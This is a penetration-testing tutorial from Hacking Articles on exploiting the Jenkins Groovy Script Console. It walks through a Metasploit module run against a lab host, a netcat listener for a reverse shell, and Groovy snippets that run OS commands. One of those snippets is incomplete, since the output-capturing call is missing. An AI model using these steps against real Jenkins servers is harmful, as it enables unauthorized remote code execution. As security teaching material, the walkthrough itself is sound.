Hello Friends!! There were so many possibilities to exploit Jenikins however we were interested in Script Console because Jenkins has lovely Groovy script console that permits anyone to run arbitrary Groovy scripts inside the Jenkins master runtime.
Table of Content
- Jenkin’s Groovy Script Console
- Groovy executing shell commands -I
- Groovy executing shell commands -II
Jenkin’s Groovy Script Console
Jenkins features a nice Groovy script console which allows one to run arbitrary Groovy scripts within the Jenkins master runtime or in the runtime on agents. It is a web-based Groovy shell into the Jenkins runtime. Groovy is a very powerful language which offers the ability to do practically anything Java can do including:
- Create sub-processes and execute arbitrary commands on the Jenkins master and agents.
- It can even read files in which the Jenkins master has access to on the host (like /etc/passwd)
- Decrypt credentials configured within Jenkins.
- Granting a normal Jenkins user Script Console Access is essentially the same as giving them Administrator rights within Jenkins.
This module uses the Jenkins-CI Groovy script console to execute OS commands using Java.
msf exploit(jenkins_script_console) > set rhost 192.168.1.106
msf exploit(jenkins_script_console) > set rport 8484
msf exploit(jenkins_script_console) > set targeturi /
msf exploit(jenkins_script_console) > set target 0
msf exploit(jenkins_script_console) > exploit
Metasploit uses command stager to exploit against command injection.
Hence, you can observe, that it has given meterpreter session of victim’s machine.
Suppose if you found Jenkins without login password or you are a normal user who has permission to access script console then you can exploit this privilege to get reverse shell of the machine. At Jenkins Dashboard go to Manage Jenkins and then select Script Console.
At script console, you have full privilege to run any program code, therefore I try to execute following piece of code which I had taken from Github to get reverse connection on my local machine via netcat listener.
nc –lvp 1234
Once the above script will be executed, it will give netcat session of victim’s machine.
Groovy executing shell commands -I
Similarly with the help of following piece of code which I found from this here, I try to create RCE for executing OS command through groovy script console.
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = ‘ipconfig’.execute()
println “out> $sout err> $serr”
Groovy executing shell commands -II
Similarly, I found another very small piece of code to exploit Groovy Console from here, which will generate RCE and execute shell command.
def cmd = “cmd.exe /c dir”.execute();
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here